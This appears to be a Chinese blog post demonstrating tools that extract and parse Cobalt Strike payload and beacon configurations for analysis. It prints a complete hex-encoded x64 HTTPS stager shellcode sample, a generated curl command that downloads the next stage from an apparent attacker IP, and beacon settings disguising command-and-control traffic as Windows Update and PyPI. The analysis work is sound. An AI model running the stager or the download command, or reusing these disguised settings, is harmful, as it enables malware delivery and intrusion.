🙇‍♀️🙇‍♀️🙇‍♀️感谢安全豹的jilvan大哥🙇‍♀️🙇‍♀️🙇‍♀️

让我看到了这个好用的工具cs_payload_parser.py
00000.webp

Avast - payload_tools

*这两个都是对PayLoad进行提取,不是Beacon

cs_payload_parser.py

直接提取PayLoad中的配置,支持DNS、SMB、TCP绑定/反向、HTTP/HTTPS负载。

cs_payload_extractor.py

适用于各种编码格式的负载提取器和解析器:hex、hex_array、hex_veil、dec_array、chr_array、base64、xor、inflate、gzip

示例

数据

输入

  1. FC4883E4F0E8C8000000415141505251564831D265488B5260488B5218488B5220488B7250480FB74A4A4D31C94831C0AC3C617C022C2041C1C90D4101C1E2ED524151488B52208B423C4801D0668178180B0275728B80880000004885C074674801D0508B4818448B40204901D0E35648FFC9418B34884801D64D31C94831C0AC41C1C90D4101C138E075F14C034C24084539D175D858448B40244901D066418B0C48448B401C4901D0418B04884801D0415841585E595A41584159415A4883EC204152FFE05841595A488B12E94FFFFFFF5D6A0049BE77696E696E65740041564989E64C89F141BA4C772607FFD54831C94831D24D31C04D31C94150415041BA3A5679A7FFD5E9930000005A4889C141B8BB0100004D31C9415141516A03415141BA57899FC6FFD5EB795B4889C14831D24989D84D31C952680032C884525241BAEB552E3BFFD54889C64883C3506A0A5F4889F1BA1F0000006A0068803300004989E041B90400000041BA75469E86FFD54889F14889DA49C7C0FFFFFFFF4D31C9525241BA2D06187BFFD585C00F859D01000048FFCF0F848C010000EBB3E9E4010000E882FFFFFF2F72616E645F6A736964636F64652E6373703F726E643D3236323337323700DFFB5814E0A3D0C88522A901A043CF53936F1CC9CE9D64195C57BA0D598FF9195CF4C62C6B24A2CF17C347DE275B552C00486F73743A207777772E77696E646F77737570646174652E636F6D0D0A436F6F6B69653A206C616E67756167653D656E5F55533B20454E41424C455F52414E44434F44453D313B20566973697454696D65733D303B20686176654C6F67696E3D303B2654574649443D376336653764346137363366303136380D0A4163636570743A202A2F2A0D0A496E7365637572652D52657175657374733A20310D0A557365722D4167656E743A204D6F7A696C6C612F342E302028636F6D70617469626C653B204D53494520372E303B2057696E646F7773204E5420352E313B202E4E455420434C5220322E302E3530373237290D0A00792EC7BF82E7D4661C627C4B55CB2AAAF58B4C6E16BDD59C7ECB5138B3A7227A05F9F886CC78140A77C6A8A77F116070F183FB609E57797176F207FA0041BEF0B5A256FFD54831C9BA0000400041B80010000041B94000000041BA58A453E5FFD5489353534889E74889F14889DA41B8002000004989F941BA129689E2FFD54883C42085C074B6668B074801C385C075D758585848050600000050C3E87FFDFFFF32372E3232312E35342E3232380001000000AB

输出

image.png

  1. --------------------------------------------------------------------------------
  2. CS Payload extractor v1.00                                  Avast Software s.r.o
  3. --------------------------------------------------------------------------------
  4. [*] Extracting file..
  5. --------------------------------------------------------------------------------
  6. Filename:       1
  7. Payload type:   raw_hex
  8. --------------------------------------------------------------------------------
  9. Saved as:       1_payload.bin
  10. --------------------------------------------------------------------------------
  11. [*] Parsing file..
  12. --------------------------------------------------------------------------------
  13. Filename:       1_payload.bin
  14. --------------------------------------------------------------------------------
  15. Architecture:   x64
  16. Payload type:   HTTPS stager
  17. Payload start:  0x0000
  18. Customer ID:    0x01000000 | 16777216
  19. --------------------------------------------------------------------------------
  20. Request detail:
  21. Address:        27.221.54.228
  22. Port:           443
  23. Query:          /rand_jsidcode.csp?rnd=2623727 (invalid checksum)
  24. --------------------------------------------------------------------------------
  25. Request header:
  26. Host: www.windowsupdate.com
  27. Cookie: language=en_US; ENABLE_RANDCODE=1; VisitTimes=0; haveLogin=0;&TWFID=7c6e7d4a763f0168
  28. Accept: */*
  29. Insecure-Requests: 1
  30. User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
  31. --------------------------------------------------------------------------------
  32. Curl download command:
  33. curl -o download.bin -H "Host: www.windowsupdate.com" -H "Cookie: language=en_US; ENABLE_RANDCODE=1; VisitTimes=0; haveLogin=0;&TWFID=7c6e7d4a763f0168" -H "Accept: */*" -H "Insecure-Requests: 1" -H "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" https://27.221.54.228:443/rand_jsidcode.csp?rnd=2623727
  34. --------------------------------------------------------------------------------
  35. Payload API list:
  36. Offset  | Hash value  | API name
  37. 0x00e9  | 0x0726774c  | kernel32.dll_LoadLibraryA
  38. 0x0101  | 0xa779563a  | wininet.dll_InternetOpenA
  39. 0x0123  | 0xc69f8957  | wininet.dll_InternetConnectA
  40. 0x0142  | 0x3b2e55eb  | wininet.dll_HttpOpenRequestA
  41. 0x016c  | 0x869e4675  | wininet.dll_InternetSetOptionA
  42. 0x0186  | 0x7b18062d  | wininet.dll_HttpSendRequestA
  43. 0x032b  | 0x56a2b5f0  | kernel32.dll_ExitProcess
  44. 0x0347  | 0xe553a458  | kernel32.dll_VirtualAlloc
  45. 0x0365  | 0xe2899612  | wininet.dll_InternetReadFile
  46. --------------------------------------------------------------------------------

Sentinel-One - CobaltStrikeParser

这个可能信息更全一些,直接对Beacon文件解析:

  1. parse_beacon_config.py [Beacon]

image.png
没有分隔符有点丑😑😑😑导出成文件看稍微舒服一点点:

  1. parse_beacon_config.py [Beacon] > [config]

image.png

  1. BeaconType                       - HTTPS
  2. Port                             - 443
  3. SleepTime                        - 1000
  4. MaxGetSize                       - 1398119
  5. Jitter                           - 10
  6. MaxDNS                           - Not Found
  7. PublicKey_MD5                    - 512618433b3877f918760fd7040cdb16
  8. C2Server                         - pypi.python.org,/latest/pip-check
  9. UserAgent                        - Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
  10. HttpPostUri                      - /latest/check
  11. Malleable_C2_Instructions        - Remove 2 bytes from the end
  12.                                    Remove 10 bytes from the beginning
  13.                                    Remove 0 bytes from the beginning
  14.                                    Base64 URL-safe decode
  15.                                    XOR mask w/ random key
  16. HttpGet_Metadata                 - ConstHeaders
  17.                                         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  18.                                         Referer: http://www.python.org/
  19.                                         Accept-Encoding: gzip, deflate
  20.                                    Metadata
  21.                                         base64url
  22.                                         prepend "__utmz="
  23.                                         header "Cookie"
  24. HttpPost_Metadata                - ConstHeaders
  25.                                         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  26.                                         Referer: http://www.python.org/
  27.                                         Accept-Encoding: gzip, deflate
  28.                                    SessionId
  29.                                         mask
  30.                                         base64url
  31.                                         parameter "__utmz"
  32.                                    Output
  33.                                         mask
  34.                                         base64url
  35.                                         print
  36. PipeName                         - Not Found
  37. DNS_Idle                         - Not Found
  38. DNS_Sleep                        - Not Found
  39. SSH_Host                         - Not Found
  40. SSH_Port                         - Not Found
  41. SSH_Username                     - Not Found
  42. SSH_Password_Plaintext           - Not Found
  43. SSH_Password_Pubkey              - Not Found
  44. SSH_Banner                       - Host: pypi15-python.org
  46. HttpGet_Verb                     - GET
  47. HttpPost_Verb                    - POST
  48. HttpPostChunk                    - 0
  49. Spawnto_x86                      - %windir%\syswow64\dllhost.exe
  50. Spawnto_x64                      - %windir%\sysnative\dllhost.exe
  51. CryptoScheme                     - 0
  52. Proxy_Config                     - Not Found
  53. Proxy_User                       - Not Found
  54. Proxy_Password                   - Not Found
  55. Proxy_Behavior                   - Use IE settings
  56. Watermark                        - 426352781
  57. bStageCleanup                    - False
  58. bCFGCaution                      - False
  59. KillDate                         - 0
  60. bProcInject_StartRWX             - True
  61. bProcInject_UseRWX               - True
  62. bProcInject_MinAllocSize         - 0
  63. ProcInject_PrependAppend_x86     - Empty
  64. ProcInject_PrependAppend_x64     - Empty
  65. ProcInject_Execute               - CreateThread
  66.                                    SetThreadContext
  67.                                    CreateRemoteThread
  68.                                    RtlCreateUserThread
  69. ProcInject_AllocationMethod      - VirtualAllocEx
  70. bUsesCookies                     - True
  71. HostHeader                       - Host: pypi15-python.org
  73. headersToRemove                  - Not Found
  74. DNS_Beaconing                    - Not Found
  75. DNS_get_TypeA                    - Not Found
  76. DNS_get_TypeAAAA                 - Not Found
  77. DNS_get_TypeTXT                  - Not Found
  78. DNS_put_metadata                 - Not Found
  79. DNS_put_output                   - Not Found
  80. DNS_resolver                     - Not Found
  81. DNS_strategy                     - round-robin
  82. DNS_strategy_rotate_seconds      - -1
  83. DNS_strategy_fail_x              - -1
  84. DNS_strategy_fail_seconds        - -1